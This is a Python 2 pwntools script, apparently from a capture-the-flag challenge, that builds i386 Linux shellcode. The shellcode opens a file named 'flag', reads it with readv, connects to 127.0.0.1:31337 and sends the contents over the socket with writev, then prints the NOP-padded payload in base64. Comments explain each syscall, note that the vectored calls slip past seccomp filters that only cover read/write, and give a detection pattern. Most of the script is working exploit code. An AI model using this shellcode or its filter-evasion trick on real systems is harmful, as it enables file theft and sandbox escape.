#!/usr/bin/env python
# Python 2 only: the `print` statement and str.encode('base64') below were
# both removed in Python 3.
from pwn import *
context(os='linux', arch='i386')
# The string below is handed to pwntools' asm(); the `//` comments inside it
# are stripped by the C-preprocessor pass asm() runs before assembling.
#
# What the shellcode does (i386 Linux, int 0x80 ABI: eax = syscall number,
# ebx/ecx/edx/esi = arguments 1..4):
#   1. openat(AT_FDCWD, "flag", 0)               -- eax = 0x127 (295), ebx = -100
#      "flag\0" is built on the stack from the dword 0x67616c66 plus a 0.
#   2. readv(fd, iov, 1)                          -- eax = 0x91 (145)
#      one iovec {base = the stack slot that held "flag", len = 0x100} is
#      built on the stack, so the file contents land in that stack region.
#   3. socketcall(SYS_SOCKET = 1, [2, 1, 6])      -- eax = 102, bl = 1
#      i.e. socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
#   4. socketcall(SYS_CONNECT = 3, [sock, &sa, 16])  -- eax = 102, bl = 3
#      sockaddr_in {AF_INET = 2, port 0x697a = htons(31337), 127.0.0.1}
#   5. writev(sock, iov, 1)                       -- eax = 0x92 (146)
#      reuses the iovec from step 2 (at esp+0x2c after the pushes of steps
#      3 and 4), sending the bytes read from "flag" over the socket.
#
# Net effect: read a local file and send its contents to a loopback TCP port.
# Defensive notes:
#   - readv/writev are used rather than read/write; a seccomp allowlist that
#     only accounts for read/write does not stop this, so filters should
#     treat the vectored variants the same way. Presumably that is why they
#     were chosen here -- confirm against the target's filter.
#   - Detection: an openat of a sensitive path followed by socket/connect to
#     127.0.0.1:31337 and a writev on that socket from the same process.
shellcode = '''
// openat
xor eax, eax
push eax
push 0x67616c66
mov ebx, -100
mov ecx, esp
xor edx, edx
xor esi, esi
mov ax, 0x127
int 0x80
// readv
mov ebx, eax
mov ax, 0x100
push eax
mov ecx, esp
inc ecx
inc ecx
inc ecx
inc ecx
push ecx
mov ecx, esp
xor edx, edx
inc edx
xor eax, eax
mov al, 0x91
int 0x80
// socket(2, 1, 6);
xor eax, eax
xor ebx, ebx
xor ecx, ecx
push ecx
mov cl, 6
push ecx
mov cl, 1
push ecx
mov cl, 2
push ecx
mov ecx, esp
mov bl, 1
mov al, 102
int 0x80
//connect(sock, sockaddr, 16)
mov edx, eax
xor eax, eax
xor ecx, ecx
push ecx
push ecx
push 0x0100007f // 127.0.0.1
pushw 0x697a // 31337
mov cl, 2
pushw cx
mov edi, esp
mov bl, 16
push ebx
push edi
push edx
mov ecx, esp
mov bl, 3
mov al, 102
int 0x80
// writev
mov ebx, edx
lea ecx, [esp+0x2c]
xor eax, eax
mov dl, 1
mov al, 0x92
int 0x80
'''
# Assemble, right-pad with NOPs (0x90) to exactly 0x100 bytes, and print the
# base64 encoding of the result (Python 2 str codec).
payload = asm(shellcode)
payload = payload.ljust(0x100, '\x90')
print payload.encode('base64')